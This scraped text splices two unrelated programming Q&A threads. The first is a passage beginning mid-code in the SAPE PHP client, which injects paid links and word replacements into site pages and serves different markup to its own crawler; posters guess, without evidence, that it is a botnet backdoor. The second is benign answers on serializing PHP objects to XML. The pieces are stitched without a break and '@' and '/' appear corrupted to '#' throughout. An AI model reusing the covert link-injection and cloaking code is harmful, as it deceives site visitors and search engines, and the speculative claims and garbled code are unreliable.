if (
strlen($this->_charset) > 0
&&
strlen($this->_sape_charset) > 0
&&
$this->_sape_charset != $this->_charset
&&
function_exists('iconv')
) {
$new_html = #iconv($this->_sape_charset, $this->_charset, $html);
if ($new_html) {
$html = $new_html;
}
}
if ($this->_is_our_bot) {
$html = '<sape_noindex>' . $html . '</sape_noindex>';
}
}
else {
$html = $this->_links_page;
}
if ($this->_debug) {
$html .= print_r($this, true);
}
return $html;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.links.db';
}
else {
return dirname(__FILE__) . '/links.db';
}
}
function _get_dispenser_path() {
return '/code.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
if ($this->_ignore_case) {
$this->_links = array_change_key_case($data);
}
else {
$this->_links = $data;
}
if (isset($this->_links['__sape_delimiter__'])) {
$this->_links_delimiter = $this->_links['__sape_delimiter__'];
}
if (isset($this->_links['__sape_charset__'])) {
$this->_sape_charset = $this->_links['__sape_charset__'];
}
else {
$this->_sape_charset = '';
}
if (#array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
$this->_links_page = $this->_links[$this->_request_uri];
}
else {
if (isset($this->_links['__sape_new_url__']) && strlen($this->_links['__sape_new_url__'])) {
if ($this->_is_our_bot || $this->_force_show_code) {
$this->_links_page = $this->_links['__sape_new_url__'];
}
}
}
}
}
class SAPE_context extends SAPE_base {
var $_words = array();
var $_words_page = array();
var $_user_agent = 'SAPE_Context PHP';
var $_filter_tags = array('a', 'textarea', 'select', 'script', 'style', 'label', 'noscript', 'noindex', 'button');
function SAPE_context($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function replace_in_text_segment($text) {
$debug = '';
if ($this->_debug) {
$debug .= "<!-- argument for replace_in_text_segment: \r\n" . base64_encode($text) . "\r\n -->";
}
if (count($this->_words_page) > 0) {
$source_sentence = array();
if ($this->_debug) {
$debug .= '<!-- sentences for replace: ';
}
foreach ($this->_words_page as $n => $sentence) {
//Заменяем все сущности на символы
$special_chars = array(
'&' => '&',
'"' => '"',
''' => '\'',
'<' => '<',
'>' => '>'
);
$sentence = strip_tags($sentence);
foreach ($special_chars as $from => $to) {
str_replace($from, $to, $sentence);
}
$sentence = htmlspecialchars($sentence);
$sentence = preg_quote($sentence, '/');
$replace_array = array();
if (preg_match_all('/(&[#a-zA-Z0-9]{2,6};)/isU', $sentence, $out)) {
for ($i = 0; $i < count($out[1]); $i++) {
$unspec = $special_chars[$out[1][$i]];
$real = $out[1][$i];
$replace_array[$unspec] = $real;
}
}
foreach ($replace_array as $unspec => $real) {
$sentence = str_replace($real, '((' . $real . ')|(' . $unspec . '))', $sentence);
}
$source_sentences[$n] = str_replace(' ', '((\s)|( ))+', $sentence);
if ($this->_debug) {
$debug .= $source_sentences[$n] . "\r\n\r\n";
}
}
if ($this->_debug) {
$debug .= '-->';
}
$first_part = true;
if (count($source_sentences) > 0) {
$content = '';
$open_tags = array();
$close_tag = '';
$part = strtok(' ' . $text, '<');
while ($part !== false) {
if (preg_match('/(?si)^(\/?[a-z0-9]+)/', $part, $matches)) {
$tag_name = strtolower($matches[1]);
if (substr($tag_name, 0, 1) == '/') {
$close_tag = substr($tag_name, 1);
if ($this->_debug) {
$debug .= '<!-- close_tag: ' . $close_tag . ' -->';
}
}
else {
$close_tag = '';
if ($this->_debug) {
$debug .= '<!-- open_tag: ' . $tag_name . ' -->';
}
}
$cnt_tags = count($open_tags);
if (($cnt_tags > 0) && ($open_tags[$cnt_tags - 1] == $close_tag)) {
array_pop($open_tags);
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - deleted from open_tags -->';
}
if ($cnt_tags - 1 == 0) {
if ($this->_debug) {
$debug .= '<!-- start replacement -->';
}
}
}
if (count($open_tags) == 0) {
if (!in_array($tag_name, $this->_filter_tags)) {
$split_parts = explode('>', $part, 2);
if (count($split_parts) == 2) {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $split_parts[1]) == 1) {
$split_parts[1] = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $split_parts[1], 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
$part = $split_parts[0] . '>' . $split_parts[1];
unset($split_parts);
}
}
else {
$open_tags[] = $tag_name;
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - added to open_tags, stop replacement -->';
}
}
}
}
else {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $part) == 1) {
$part = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $part, 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
}
if ($this->_debug) {
$content .= $debug;
$debug = '';
}
if ($first_part) {
$content .= $part;
$first_part = false;
}
else {
$content .= $debug . '<' . $part;
}
unset($part);
$part = strtok('<');
}
$text = ltrim($content);
unset($content);
}
}
else {
if ($this->_debug) {
$debug .= '<!-- No word`s for page -->';
}
}
if ($this->_debug) {
$debug .= '<!-- END: work of replace_in_text_segment() -->';
}
if ($this->_is_our_bot || $this->_force_show_code || $this->_debug) {
$text = '<sape_index>' . $text . '</sape_index>';
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$text .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
if (count($this->_words_page) > 0) {
$text .= '<!-- Not replaced: ' . "\r\n";
foreach ($this->_words_page as $n => $value) {
$text .= $value . "\r\n\r\n";
}
$text .= '-->';
}
$text .= $debug;
}
return $text;
}
function replace_in_page(&$buffer) {
if (count($this->_words_page) > 0) {
$split_content = preg_split('/(?smi)(<\/?sape_index>)/', $buffer, -1);
$cnt_parts = count($split_content);
if ($cnt_parts > 1) {
//Если есть хоть одна пара sape_index, то начинаем работу
if ($cnt_parts >= 3) {
for ($i = 1; $i < $cnt_parts; $i = $i + 2) {
$split_content[$i] = $this->replace_in_text_segment($split_content[$i]);
}
}
$buffer = implode('', $split_content);
if ($this->_debug) {
$buffer .= '<!-- Split by Sape_index cnt_parts=' . $cnt_parts . '-->';
}
}
else {
$split_content = preg_split('/(?smi)(<\/?body[^>]*>)/', $buffer, -1, PREG_SPLIT_DELIM_CAPTURE);
if (count($split_content) == 5) {
$split_content[0] = $split_content[0] . $split_content[1];
$split_content[1] = $this->replace_in_text_segment($split_content[2]);
$split_content[2] = $split_content[3] . $split_content[4];
unset($split_content[3]);
unset($split_content[4]);
$buffer = $split_content[0] . $split_content[1] . $split_content[2];
if ($this->_debug) {
$buffer .= '<!-- Split by BODY -->';
}
}
else {
if ($this->_debug) {
$buffer .= '<!-- Can`t split by BODY -->';
}
}
}
}
else {
if (!$this->_is_our_bot && !$this->_force_show_code && !$this->_debug) {
$buffer = preg_replace('/(?smi)(<\/?sape_index>)/', '', $buffer);
}
else {
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$buffer .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
$buffer .= '<!-- No word`s for page -->';
}
}
return $buffer;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.words.db';
}
else {
return dirname(__FILE__) . '/words.db';
}
}
function _get_dispenser_path() {
return '/code_context.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
$this->_words = $data;
if (#array_key_exists($this->_request_uri, $this->_words) && is_array($this->_words[$this->_request_uri])) {
$this->_words_page = $this->_words[$this->_request_uri];
}
}
}
?>
Sape is apparently link exchange service used by a Russian-speaking botnet owner.
This backdoor appears to use the sape API to download XML and use bots to create a "context" that probably clicks links to generate illicit revenue.
From a bad Google transition of sape.ru:
Sape system increases revenue and reduces the consumption of
webmasters optimizers. Venues are beginning to sell the place, not
only from the main pages, but also internal. How many pages on the
site? Let each revenue. Optimizers are buying cheap internal pages and
save on moving projects.
My Russian isn't very good, but sape.ru looks like some kind of link exchange service. And in answer to your question "Who is SAPE":
[david#archtower ~]$ whois sape.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: SAPE.RU
nserver: ns1.q0.ru.
nserver: ns2.q0.ru.
nserver: ns3.q0.ru.
state: REGISTERED, DELEGATED, VERIFIED
org: LTD Sape
registrar: R01-REG-RIPN
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2006.06.20
paid-till: 2013.06.20
free-date: 2013.07.21
source: TCI
Last updated on 2012.06.19 19:28:42 MSK
[david#archtower ~]$
Looks like it's something to automatically visit ads referral links at first glance.
What is the best way to take a given PHP object and serialize it as XML? I am looking at simple_xml and I have used it to parse XML into objects, but it isn't clear to me how it works the other way around.
I'd agree with using PEAR's XML_Serializer, but if you want something simple that supports objects/arrays that have properties nested, you can use this.
class XMLSerializer {
// functions adopted from http://www.sean-barton.co.uk/2009/03/turning-an-array-or-object-into-xml-using-php/
public static function generateValidXmlFromObj(stdClass $obj, $node_block='nodes', $node_name='node') {
$arr = get_object_vars($obj);
return self::generateValidXmlFromArray($arr, $node_block, $node_name);
}
public static function generateValidXmlFromArray($array, $node_block='nodes', $node_name='node') {
$xml = '<?xml version="1.0" encoding="UTF-8" ?>';
$xml .= '<' . $node_block . '>';
$xml .= self::generateXmlFromArray($array, $node_name);
$xml .= '</' . $node_block . '>';
return $xml;
}
private static function generateXmlFromArray($array, $node_name) {
$xml = '';
if (is_array($array) || is_object($array)) {
foreach ($array as $key=>$value) {
if (is_numeric($key)) {
$key = $node_name;
}
$xml .= '<' . $key . '>' . self::generateXmlFromArray($value, $node_name) . '</' . $key . '>';
}
} else {
$xml = htmlspecialchars($array, ENT_QUOTES);
}
return $xml;
}
}
take a look at PEAR's XML_Serializer package. I've used it with pretty good results. You can feed it arrays, objects etc and it will turn them into XML. It also has a bunch of options like picking the name of the root node etc.
Should do the trick
not quite an answer to the original question, but the way i solved my problem with this was by declaring my object as:
$root = '<?xml version="1.0" encoding="UTF-8"?><Activities/>';
$object = new simpleXMLElement($root);
as opposed to:
$object = new stdClass;
before i started adding any values!
Use a dom function to do it:
http://www.php.net/manual/en/function.dom-import-simplexml.php
Import the SimpleXML object and then save. The above link contains an example. :)
In a nutshell:
<?php
$array = array('hello' => 'world', 'good' => 'morning');
$xml = simplexml_load_string("<?xml version='1.0' encoding='utf-8'?><foo />");
foreach ($array as $k=>$v) {
$xml->addChild($k, $v);
}
?>
take a look at my version
class XMLSerializer {
/**
*
* The most advanced method of serialization.
*
* #param mixed $obj => can be an objectm, an array or string. may contain unlimited number of subobjects and subarrays
* #param string $wrapper => main wrapper for the xml
* #param array (key=>value) $replacements => an array with variable and object name replacements
* #param boolean $add_header => whether to add header to the xml string
* #param array (key=>value) $header_params => array with additional xml tag params
* #param string $node_name => tag name in case of numeric array key
*/
public static function generateValidXmlFromMixiedObj($obj, $wrapper = null, $replacements=array(), $add_header = true, $header_params=array(), $node_name = 'node')
{
$xml = '';
if($add_header)
$xml .= self::generateHeader($header_params);
if($wrapper!=null) $xml .= '<' . $wrapper . '>';
if(is_object($obj))
{
$node_block = strtolower(get_class($obj));
if(isset($replacements[$node_block])) $node_block = $replacements[$node_block];
$xml .= '<' . $node_block . '>';
$vars = get_object_vars($obj);
if(!empty($vars))
{
foreach($vars as $var_id => $var)
{
if(isset($replacements[$var_id])) $var_id = $replacements[$var_id];
$xml .= '<' . $var_id . '>';
$xml .= self::generateValidXmlFromMixiedObj($var, null, $replacements, false, null, $node_name);
$xml .= '</' . $var_id . '>';
}
}
$xml .= '</' . $node_block . '>';
}
else if(is_array($obj))
{
foreach($obj as $var_id => $var)
{
if(!is_object($var))
{
if (is_numeric($var_id))
$var_id = $node_name;
if(isset($replacements[$var_id])) $var_id = $replacements[$var_id];
$xml .= '<' . $var_id . '>';
}
$xml .= self::generateValidXmlFromMixiedObj($var, null, $replacements, false, null, $node_name);
if(!is_object($var))
$xml .= '</' . $var_id . '>';
}
}
else
{
$xml .= htmlspecialchars($obj, ENT_QUOTES);
}
if($wrapper!=null) $xml .= '</' . $wrapper . '>';
return $xml;
}
/**
*
* xml header generator
* #param array $params
*/
public static function generateHeader($params = array())
{
$basic_params = array('version' => '1.0', 'encoding' => 'UTF-8');
if(!empty($params))
$basic_params = array_merge($basic_params,$params);
$header = '<?xml';
foreach($basic_params as $k=>$v)
{
$header .= ' '.$k.'='.$v;
}
$header .= ' ?>';
return $header;
}
}
use WDDX:
http://uk.php.net/manual/en/wddx.examples.php
(if this extension is installed)
it's dedicated to that:
http://www.openwddx.org/
Here is my code used for serializing PHP objects to XML "understandable" by Microsoft .NET XmlSerializer.Deserialize
class XMLSerializer {
/**
* Get object class name without namespace
* #param object $object Object to get class name from
* #return string Class name without namespace
*/
private static function GetClassNameWithoutNamespace($object) {
$class_name = get_class($object);
return end(explode('\\', $class_name));
}
/**
* Converts object to XML compatible with .NET XmlSerializer.Deserialize
* #param type $object Object to serialize
* #param type $root_node Root node name (if null, objects class name is used)
* #return string XML string
*/
public static function Serialize($object, $root_node = null) {
$xml = '<?xml version="1.0" encoding="UTF-8" ?>';
if (!$root_node) {
$root_node = self::GetClassNameWithoutNamespace($object);
}
$xml .= '<' . $root_node . ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">';
$xml .= self::SerializeNode($object);
$xml .= '</' . $root_node . '>';
return $xml;
}
/**
* Create XML node from object property
* #param mixed $node Object property
* #param string $parent_node_name Parent node name
* #param bool $is_array_item Is this node an item of an array?
* #return string XML node as string
* #throws Exception
*/
private static function SerializeNode($node, $parent_node_name = false, $is_array_item = false) {
$xml = '';
if (is_object($node)) {
$vars = get_object_vars($node);
} else if (is_array($node)) {
$vars = $node;
} else {
throw new Exception('Coś poszło nie tak');
}
foreach ($vars as $k => $v) {
if (is_object($v)) {
$node_name = ($parent_node_name ? $parent_node_name : self::GetClassNameWithoutNamespace($v));
if (!$is_array_item) {
$node_name = $k;
}
$xml .= '<' . $node_name . '>';
$xml .= self::SerializeNode($v);
$xml .= '</' . $node_name . '>';
} else if (is_array($v)) {
$xml .= '<' . $k . '>';
if (count($v) > 0) {
if (is_object(reset($v))) {
$xml .= self::SerializeNode($v, self::GetClassNameWithoutNamespace(reset($v)), true);
} else {
$xml .= self::SerializeNode($v, gettype(reset($v)), true);
}
} else {
$xml .= self::SerializeNode($v, false, true);
}
$xml .= '</' . $k . '>';
} else {
$node_name = ($parent_node_name ? $parent_node_name : $k);
if ($v === null) {
continue;
} else {
$xml .= '<' . $node_name . '>';
if (is_bool($v)) {
$xml .= $v ? 'true' : 'false';
} else {
$xml .= htmlspecialchars($v, ENT_QUOTES);
}
$xml .= '</' . $node_name . '>';
}
}
}
return $xml;
}
}
example:
class GetProductsCommandResult {
public $description;
public $Errors;
}
class Error {
public $id;
public $error;
}
$obj = new GetProductsCommandResult();
$obj->description = "Teścik";
$obj->Errors = array();
$obj->Errors[0] = new Error();
$obj->Errors[0]->id = 666;
$obj->Errors[0]->error = "Sth";
$obj->Errors[1] = new Error();
$obj->Errors[1]->id = 666;
$obj->Errors[1]->error = null;
$xml = XMLSerializer::Serialize($obj);
results in:
<?xml version="1.0" encoding="UTF-8"?>
<GetProductsCommandResult xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<description>Teścik</description>
<Errors>
<Error>
<id>666</id>
<error>Sth</error>
</Error>
<Error>
<id>666</id>
</Error>
</Errors>
</GetProductsCommandResult>
I know this is an old question, but recently I had to generate complex XML structures.
My approach contains advanced OOP principles. The idea is to serialize the parent object who contains multiple children and subchildren.
Nodes get names from the class names but you can override the class name with the first parameter when creating an object for serialization.
You can create: a Simple node, without child nodes, EntityList and ArrayList. EntityList is a list of objects of the same class, but an ArrayList may have different objects.
Each object has to extend the abstract class SerializeXmlAbstract in order to match first input parameter in class: Object2xml, method serialize($object, $name = NULL, $prefix = FALSE).
By default, if you don't provide the second parameter, the root XML node will have the class name of the given object. The third parameter indicates if root node name has a prefix or not. Prefix is hardcoded as a private property in Export2xml class.
interface SerializeXml {
public function hasAttributes();
public function getAttributes();
public function setAttributes($attribs = array());
public function getNameOwerriden();
public function isNameOwerriden();
}
abstract class SerializeXmlAbstract implements SerializeXml {
protected $attributes;
protected $nameOwerriden;
function __construct($name = NULL) {
$this->nameOwerriden = $name;
}
public function getAttributes() {
return $this->attributes;
}
public function getNameOwerriden() {
return $this->nameOwerriden;
}
public function setAttributes($attribs = array()) {
$this->attributes = $attribs;
}
public function hasAttributes() {
return (is_array($this->attributes) && count($this->attributes) > 0) ? TRUE : FALSE;
}
public function isNameOwerriden() {
return $this->nameOwerriden != NULL ? TRUE : FALSE;
}
}
abstract class Entity_list extends SplObjectStorage {
protected $_listItemType;
public function __construct($type) {
$this->setListItemType($type);
}
private function setListItemType($param) {
$this->_listItemType = $param;
}
public function detach($object) {
if ($object instanceOf $this->_listItemType) {
parent::detach($object);
}
}
public function attach($object, $data = null) {
if ($object instanceOf $this->_listItemType) {
parent::attach($object, $data);
}
}
}
abstract class Array_list extends SerializeXmlAbstract {
protected $_listItemType;
protected $_items;
public function __construct() {
//$this->setListItemType($type);
$this->_items = new SplObjectStorage();
}
protected function setListItemType($param) {
$this->_listItemType = $param;
}
public function getArray() {
$return = array();
$this->_items->rewind();
while ($this->_items->valid()) {
$return[] = $this->_items->current();
$this->_items->next();
}
// print_r($return);
return $return;
}
public function detach($object) {
if ($object instanceOf $this->_listItemType) {
if (in_array($this->_items->contains($object))) {
$this->_items->detach($object);
}
}
}
public function attachItem($ob) {
$this->_items->attach($ob);
}
}
class Object2xml {
public $rootPrefix = "ernm";
private $addPrefix;
public $xml;
public function serialize($object, $name = NULL, $prefix = FALSE) {
if ($object instanceof SerializeXml) {
$this->xml = new DOMDocument('1.0', 'utf-8');
$this->xml->appendChild($this->object2xml($object, $name, TRUE));
$this->xml->formatOutput = true;
echo $this->xml->saveXML();
} else {
die("Not implement SerializeXml interface");
}
}
protected function object2xml(SerializeXmlAbstract $object, $nodeName = NULL, $prefix = null) {
$single = property_exists(get_class($object), "value");
$nName = $nodeName != NULL ? $nodeName : get_class($object);
if ($prefix) {
$nName = $this->rootPrefix . ":" . $nName;
}
if ($single) {
$ref = $this->xml->createElement($nName);
} elseif (is_object($object)) {
if ($object->isNameOwerriden()) {
$nodeName = $object->getNameOwerriden();
}
$ref = $this->xml->createElement($nName);
if ($object->hasAttributes()) {
foreach ($object->getAttributes() as $key => $value) {
$ref->setAttribute($key, $value);
}
}
foreach (get_object_vars($object) as $n => $prop) {
switch (gettype($prop)) {
case "object":
if ($prop instanceof SplObjectStorage) {
$ref->appendChild($this->handleList($n, $prop));
} elseif ($prop instanceof Array_list) {
$node = $this->object2xml($prop);
foreach ($object->ResourceGroup->getArray() as $key => $value) {
$node->appendChild($this->object2xml($value));
}
$ref->appendChild($node);
} else {
$ref->appendChild($this->object2xml($prop));
}
break;
default :
if ($prop != null) {
$ref->appendChild($this->xml->createElement($n, $prop));
}
break;
}
}
} elseif (is_array($object)) {
foreach ($object as $value) {
$ref->appendChild($this->object2xml($value));
}
}
return $ref;
}
private function handleList($name, SplObjectStorage $param, $nodeName = NULL) {
$lst = $this->xml->createElement($nodeName == NULL ? $name : $nodeName);
$param->rewind();
while ($param->valid()) {
if ($param->current() != null) {
$lst->appendChild($this->object2xml($param->current()));
}
$param->next();
}
return $lst;
}
}
This is code you need to be able to get valid xml from objects. Next sample produces this xml:
<InsertMessage priority="high">
<NodeSimpleValue firstAttrib="first" secondAttrib="second">simple value</NodeSimpleValue>
<Arrarita>
<Title>PHP OOP is great</Title>
<SequenceNumber>1</SequenceNumber>
<Child>
<FirstChild>Jimmy</FirstChild>
</Child>
<Child2>
<FirstChild>bird</FirstChild>
</Child2>
</Arrarita>
<ThirdChild>
<NodeWithChilds>
<FirstChild>John</FirstChild>
<ThirdChild>James</ThirdChild>
</NodeWithChilds>
<NodeWithChilds>
<FirstChild>DomDocument</FirstChild>
<SecondChild>SplObjectStorage</SecondChild>
</NodeWithChilds>
</ThirdChild>
</InsertMessage>
Classes needed for this xml are:
class NodeWithArrayList extends Array_list {
public $Title;
public $SequenceNumber;
public function __construct($name = NULL) {
echo $name;
parent::__construct($name);
}
}
class EntityListNode extends Entity_list {
public function __construct($name = NULL) {
parent::__construct($name);
}
}
class NodeWithChilds extends SerializeXmlAbstract {
public $FirstChild;
public $SecondChild;
public $ThirdChild;
public function __construct($name = NULL) {
parent::__construct($name);
}
}
class NodeSimpleValue extends SerializeXmlAbstract {
protected $value;
public function getValue() {
return $this->value;
}
public function setValue($value) {
$this->value = $value;
}
public function __construct($name = NULL) {
parent::__construct($name);
}
}
And finally code that instantiate objects is:
$firstChild = new NodeSimpleValue("firstChild");
$firstChild->setValue( "simple value" );
$firstChild->setAttributes(array("firstAttrib" => "first", "secondAttrib" => "second"));
$secondChild = new NodeWithArrayList("Arrarita");
$secondChild->Title = "PHP OOP is great";
$secondChild->SequenceNumber = 1;
$firstListItem = new NodeWithChilds();
$firstListItem->FirstChild = "John";
$firstListItem->ThirdChild = "James";
$firstArrayItem = new NodeWithChilds("Child");
$firstArrayItem->FirstChild = "Jimmy";
$SecondArrayItem = new NodeWithChilds("Child2");
$SecondArrayItem->FirstChild = "bird";
$secondListItem = new NodeWithChilds();
$secondListItem->FirstChild = "DomDocument";
$secondListItem->SecondChild = "SplObjectStorage";
$secondChild->attachItem($firstArrayItem);
$secondChild->attachItem($SecondArrayItem);
$list = new EntityListNode("NodeWithChilds");
$list->attach($firstListItem);
$list->attach($secondListItem);
$message = New NodeWithChilds("InsertMessage");
$message->setAttributes(array("priority" => "high"));
$message->FirstChild = $firstChild;
$message->SecondChild = $secondChild;
$message->ThirdChild = $list;
$object2xml = new Object2xml();
$object2xml->serialize($message, "xml", TRUE);
Hope it will help someone.
Cheers,
Siniša
Use recursive method, like this:
private function ReadProperty($xmlElement, $object) {
foreach ($object as $key => $value) {
if ($value != null) {
if (is_object($value)) {
$element = $this->xml->createElement($key);
$this->ReadProperty($element, $value);
$xmlElement->AppendChild($element);
} elseif (is_array($value)) {
$this->ReadProperty($xmlElement, $value);
} else {
$this->AddAttribute($xmlElement, $key, $value);
}
}
}
}
Here the complete example:
http://www.tyrodeveloper.com/2018/09/convertir-clase-en-xml-con-php.html
I recently created a class available via git that resolves this problem:
https://github.com/zappz88/XMLSerializer
Here is the class structure, and keep in mind that you will need to define the root properly for format proper xml:
class XMLSerializer {
private $OpenTag = "<";
private $CloseTag = ">";
private $BackSlash = "/";
public $Root = "root";
public function __construct() {
}
private function Array_To_XML($array, $arrayElementName = "element_", $xmlString = "")
{
if($xmlString === "")
{
$xmlString = "{$this->OpenTag}{$this->Root}{$this->CloseTag}";
}
$startTag = "{$this->OpenTag}{$arrayElementName}{$this->CloseTag}";
$xmlString .= $startTag;
foreach($array as $key => $value){
if(gettype($value) === "string" || gettype($value) === "boolean" || gettype($value) === "integer" || gettype($value) === "double" || gettype($value) === "float")
{
$elementStartTag = "{$this->OpenTag}{$arrayElementName}_{$key}{$this->CloseTag}";
$elementEndTag = "{$this->OpenTag}{$this->BackSlash}{$arrayElementName}_{$key}{$this->CloseTag}";
$xmlString .= "{$elementStartTag}{$value}{$elementEndTag}";
continue;
}
else if(gettype($value) === "array")
{
$xmlString = $this->Array_To_XML($value, $arrayElementName, $xmlString);
continue;
}
else if(gettype($value) === "object")
{
$xmlString = $this->Object_To_XML($value, $xmlString);
continue;
}
else
{
continue;
}
}
$endTag = "{$this->OpenTag}{$this->BackSlash}{$arrayElementName}{$this->CloseTag}";
$xmlString .= $endTag;
return $xmlString;
}
private function Object_To_XML($objElement, $xmlString = "")
{
if($xmlString === "")
{
$xmlString = "{$this->OpenTag}{$this->Root}{$this->CloseTag}";
}
foreach($objElement as $key => $value){
if(gettype($value) !== "array" && gettype($value) !== "object")
{
$startTag = "{$this->OpenTag}{$key}{$this->CloseTag}";
$endTag = "{$this->OpenTag}{$this->BackSlash}{$key}{$this->CloseTag}";
$xmlString .= "{$startTag}{$value}{$endTag}";
continue;
}
else if(gettype($value) === "array")
{
$xmlString = $this->Array_To_XML($value, $key, $xmlString);
continue;
}
else if(gettype($value) === "object")
{
$xmlString = $this->Object_To_XML($value, $xmlString);
continue;
}
else
{
continue;
}
}
return $xmlString;
}
public function Serialize_Object($element, $xmlString = "")
{
$endTag = "{$this->OpenTag}{$this->BackSlash}{$this->Root}{$this->CloseTag}";
return "{$this->Object_To_XML($element, $xmlString)}{$endTag}";
}
public function Serialize_Array($element, $xmlString = "")
{
$endTag = "{$this->OpenTag}{$this->BackSlash}{$this->Root}{$this->CloseTag}";
return "{$this->Array_To_XML($element, $xmlString)}{$endTag}";
}
}
While I agree with #philfreo and his reasoning that you shouldn't be dependant on PEAR, his solution is still not quite there. There are potential issues when the key could be a string that contains any of the following characters:
<
>
\s (space)
"
'
Any of these will throw off the format, as XML uses these characters in its grammar. So, without further ado, here is a simple solution to that very possible occurrence:
function xml_encode( $var, $indent = false, $i = 0 ) {
$version = "1.0";
if ( !$i ) {
$data = '<?xml version="1.0"?>' . ( $indent ? "\r\n" : '' )
. '<root vartype="' . gettype( $var ) . '" xml_encode_version="'. $version . '">' . ( $indent ? "\r\n" : '' );
}
else {
$data = '';
}
foreach ( $var as $k => $v ) {
$data .= ( $indent ? str_repeat( "\t", $i ) : '' ) . '<var vartype="' .gettype( $v ) . '" varname="' . htmlentities( $k ) . '"';
if($v == "") {
$data .= ' />';
}
else {
$data .= '>';
if ( is_array( $v ) ) {
$data .= ( $indent ? "\r\n" : '' ) . xml_encode( $v, $indent, $verbose, ($i + 1) ) . ( $indent ? str_repeat("\t", $i) : '' );
}
else if( is_object( $v ) ) {
$data .= ( $indent ? "\r\n" : '' ) . xml_encode( json_decode( json_encode( $v ), true ), $indent, $verbose, ($i + 1)) . ($indent ? str_repeat("\t", $i) : '');
}
else {
$data .= htmlentities( $v );
}
$data .= '</var>';
}
$data .= ($indent ? "\r\n" : '');
}
if ( !$i ) {
$data .= '</root>';
}
return $data;
}
Here is a sample usage:
// sample object
$tests = Array(
"stringitem" => "stringvalue",
"integeritem" => 1,
"floatitem" => 1.00,
"arrayitems" => Array("arrayvalue1", "arrayvalue2"),
"hashitems" => Array( "hashkey1" => "hashkey1value", "hashkey2" => "hashkey2value" ),
"literalnull" => null,
"literalbool" => json_decode( json_encode( 1 ) )
);
// add an objectified version of itself as a child
$tests['objectitem'] = json_decode( json_encode( $tests ), false);
// convert and output
echo xml_encode( $tests );
/*
// output:
<?xml version="1.0"?>
<root vartype="array" xml_encode_version="1.0">
<var vartype="integer" varname="integeritem">1</var>
<var vartype="string" varname="stringitem">stringvalue</var>
<var vartype="double" varname="floatitem">1</var>
<var vartype="array" varname="arrayitems">
<var vartype="string" varname="0">arrayvalue1</var>
<var vartype="string" varname="1">arrayvalue2</var>
</var>
<var vartype="array" varname="hashitems">
<var vartype="string" varname="hashkey1">hashkey1value</var>
<var vartype="string" varname="hashkey2">hashkey2value</var>
</var>
<var vartype="NULL" varname="literalnull" />
<var vartype="integer" varname="literalbool">1</var>
<var vartype="object" varname="objectitem">
<var vartype="string" varname="stringitem">stringvalue</var>
<var vartype="integer" varname="integeritem">1</var>
<var vartype="integer" varname="floatitem">1</var>
<var vartype="array" varname="arrayitems">
<var vartype="string" varname="0">arrayvalue1</var>
<var vartype="string" varname="1">arrayvalue2</var>
</var>
<var vartype="array" varname="hashitems">
<var vartype="string" varname="hashkey1">hashkey1value</var>
<var vartype="string" varname="hashkey2">hashkey2value</var>
</var>
<var vartype="NULL" varname="literalnull" />
<var vartype="integer" varname="literalbool">1</var>
</var>
</root>
*/
Notice that the key names are stored in the varname attribute (html encoded), and even the type is stored, so symmetric de-serialization is possible. There is only one issue with this: it will not serialize classes, only the instantiated object, which will not include the class methods. This is only functional for passing "data" back and forth.
I hope this helps someone, even though this was answered long ago.
Well, while a little dirty, you could always run a loop on the object's properties...
$_xml = '';
foreach($obj as $key => $val){
$_xml .= '<' . $key . '>' . $val . '</' . $key . ">\n";
}
Using fopen/fwrite/fclose you could generate an XML doc with the $_xml variable as content. It's ugly, but it would work.